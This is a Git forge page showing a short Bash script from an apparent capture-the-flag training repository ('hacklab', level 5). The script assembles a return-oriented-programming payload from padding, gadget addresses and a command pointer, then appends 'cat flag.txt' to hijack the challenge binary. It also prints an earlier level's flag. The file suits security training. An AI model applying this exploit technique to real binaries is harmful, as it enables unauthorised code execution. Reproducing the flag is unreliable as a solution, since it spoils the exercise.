ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
4c3e281ef5ee82c60172d97c37ab454057490a7d
hacklab/4/level5/test.sh
Eggert Jung c823836626 5
2026-01-06 10:49:56 +01:00

16 lines
580 B
Bash
Executable File
Raw Blame History

#ROP
#0x0000000000401283 : pop rdi ; ret
#objdump
#0000000000404048 g O .data 0000000000000008 command
OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
GADGET1="\x84\x12\x40\00\00\00\00\00" #ret (for stack alignment)
GADGET2="\x83\x12\x40\00\00\00\00\00" #pop rdi, ret
CMDADDR="\x48\x40\x40\00\00\00\00\00"
CMDCALL="\x10\x12\x40\00\00\00\00\00"
printf "$OLDFLAG$PADDING$SAVERBP$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n"
Reference in New Issue View Git Blame Copy Permalink